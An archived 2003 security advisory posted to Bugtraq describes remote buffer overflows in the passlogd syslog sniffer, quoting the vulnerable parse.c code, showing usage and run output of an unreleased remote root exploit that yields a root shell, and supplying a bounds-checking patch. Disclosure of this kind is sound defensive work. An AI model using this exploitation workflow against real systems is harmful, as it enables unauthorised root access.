| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20030402175530.26125.qmail@hackermail.com>
Date: Thu, 03 Apr 2003 01:55:30 +0800
From: "dong-h0un U" <xploit@...kermail.com>
To: bugtraq@...urityfocus.com, vulnwatch@...nwatch.org
Subject: [INetCop Security Advisory] Remote Multiple Buffer Overflow
vulnerability in passlogd sniffer.
========================================
INetCop Security Advisory #2003-0x82-015
========================================
* Title: Remote Multiple Buffer Overflow vulnerability in passlogd sniffer.
0x01. Description
About:
passlogd(passive syslog capture daemon) is a purpose-built sniffer for capturing
syslog messages in transit. This allows for backup logging to be performed on
a machine with no open ports.
This program is introduced in securityfocus: http://www.securityfocus.com/tools/2076
Vulnerability can presume as following.
There is sl_parse() function to 33 lines of 'passlogd-0.1d/parse.c' code.
__
33 void sl_parse(char *user, struct pcap_pkthdr *pkthdr, u_char *pkt)
34 {
...
42 char level[5];
43 char message[1024];
44 char buffer[4096];
...
77 while(pkt[i] != '>'){
78 level[j] = pkt[i]; // First, buffer overflow happens.
79 i++;
80 j++;
81 }
82 i++;
...
87 while(pkt[i] != '\n' && pkt[i] != '\r' && i < (pkthdr->caplen - 1)){
88 if(debug)
89 printf("at byte %d of %d\n", i, pkthdr->caplen - 1);
90 message[z] = pkt[i]; // Second, buffer overflow happens.
91 i++;
92 z++;
93 }
...
103 /* built the logstring */
104 if(dflag){
105 sprintf(buffer, "%s %s\n", srcip, message); // Very dangerous.
106 }
107 else {
108 sprintf(buffer, "%s to %s: <%s> %s\n", srcip, dstip, level, message) // Similarly, is dangerous.
;
109 }
... /* Role of original is like this. */
123 syslev = atoi(level);
124 openlog("passlogd", 0, LOG_DAEMON);
125 syslog(syslev, "%s", buffer);
--
Visual point that change flowing of this program, happen after overwrited stack variables.
Of course, frame pointer overrun exists together.
0x02. Vulnerable Packages
Vendor site: http://www.morphine.com/src/passlogd.html
passlogd v0.1d
-passlogd-0.1d.tar.gz
+FreeBSD
+OpenBSD
+Linux
+Other
passlogd v0.1c
-passlogd-0.1c.tar.gz
passlogd v0.1b
-passlogd-0.1b.tar.gz
passlogd v0.1a
-passlogd-0.1a.tar.gz
0x03. Exploit
Our proof of concept code was completed.
Exhibit it sooner or later.
bash-2.04# ./0x82-Remote.passlogd_sniff.xpl
passlogd sniffer remote buffer overflow root exploit
by Xpl017Elz.
Usage: ./0x82-Remote.passlogd_sniff.xpl -option [argument]
-h - hostname.
-f - spoof src ip.
-s - &shellcode.
-l - buf len.
-t - target number.
-i - help information.
Select target number:
{0} ALZZA Linux release 6.1 (Linux One)
{1} WOW Linux release 6.2 (Puberty)
{2} RedHat Linux release 7.0 (Guinness)
{3} WOWLiNUX Release 7.1 (Paran)
{4} RedHat Linux release 8.0 (Psyche)
Example> ./0x82-Remote.passlogd_sniff.xpl -h localhost -f82.82.82.82 -t3
Example2> ./0x82-Remote.passlogd_sniff.xpl -h localhost -s0x82828282 -l582
bash-2.04#
test exploit result: --
#1) attacker system:
bash-2.04# ./0x82-Remote.passlogd_sniff.xpl -h61.37.xxx.xx -t2 -s0x82828282
passlogd sniffer remote buffer overflow root exploit
by Xpl017Elz.
[0] Set packet code size.
[1] Set protocol header.
[2] Make shellcode.
[3] Set rawsock.
[4] Send packet.
[5] Trying 61.37.xxx.xx:36864.
[-] Connect Failed.
bash-2.04#
#2) target system:
[root@...h /passlogd-0.1d]# gdb -q ./passlogd
(gdb) r
Starting program: /passlogd-0.1d/./passlogd
Wed Mar 26 12:16:27 2003
to
: <
>
r^) F @ F @ F N f C F f ^ F )
F f F N N N f ^ CC f V V fC ?) ?A ?A V v K
/bin/shd
Program received signal SIGSEGV, Segmentation fault.
0x82828282 in ?? ()
(gdb)
real exploit result: --
bash-2.04# ./0x82-Remote.passlogd_sniff.xpl -h61.37.xxx.xx -t2
passlogd sniffer remote buffer overflow root exploit
by Xpl017Elz.
[0] Set packet code size.
[1] Set protocol header.
[2] Make shellcode.
[3] Set rawsock.
[4] Send packet.
[5] Trying 61.37.xxx.xx:36864.
[*] Connected to 61.37.xxx.xx:36864.
[*] Executed shell successfully !
Linux blah 2.4.20 #1 SMP Fri Mar 21 20:36:58 EST 2003 i686 unknown
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@...h /passlogd-0.1d]#
--
0x04. Patch
=== parse.patch ===
--- parse.c Sat Jun 9 14:07:45 2001
+++ parse.patch.c Wed Mar 26 11:48:33 2003
@@ -75,6 +75,10 @@
j=0;
while(pkt[i] != '>'){
+ if(j==sizeof(level)-1)
+ {
+ break;
+ }
level[j] = pkt[i];
i++;
j++;
@@ -87,6 +91,10 @@
while(pkt[i] != '\n' && pkt[i] != '\r' && i < (pkthdr->caplen - 1)){
if(debug)
printf("at byte %d of %d\n", i, pkthdr->caplen - 1);
+ if(z==sizeof(message)-1)
+ {
+ break;
+ }
message[z] = pkt[i];
i++;
z++;
@@ -102,10 +110,10 @@
/* built the logstring */
if(dflag){
- sprintf(buffer, "%s %s\n", srcip, message);
+ snprintf(buffer, sizeof(buffer)-1, "%s %s\n", srcip, message);
}
else {
- sprintf(buffer, "%s to %s: <%s> %s\n", srcip, dstip, level, message);
+ snprintf(buffer, sizeof(buffer)-1, "%s to %s: <%s> %s\n", srcip, dstip, level, message);
}
if(debug){
=== eof ===
P.S: Sorry, for my poor english.
--
By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security.
MSN & E-mail: szoahc(at)hotmail(dot)com,
xploit(at)hackermail(dot)com
INetCop Security Home: http://www.inetcop.org (Korean hacking game)
My World: http://x82.i21c.net & http://x82.inetcop.org
GPG public key: http://x82.inetcop.org/h0me/pr0file/x82.k3y
--
--
_______________________________________________
Get your free email from http://www.hackermail.com
Powered by Outblaze
Powered by blists - more mailing lists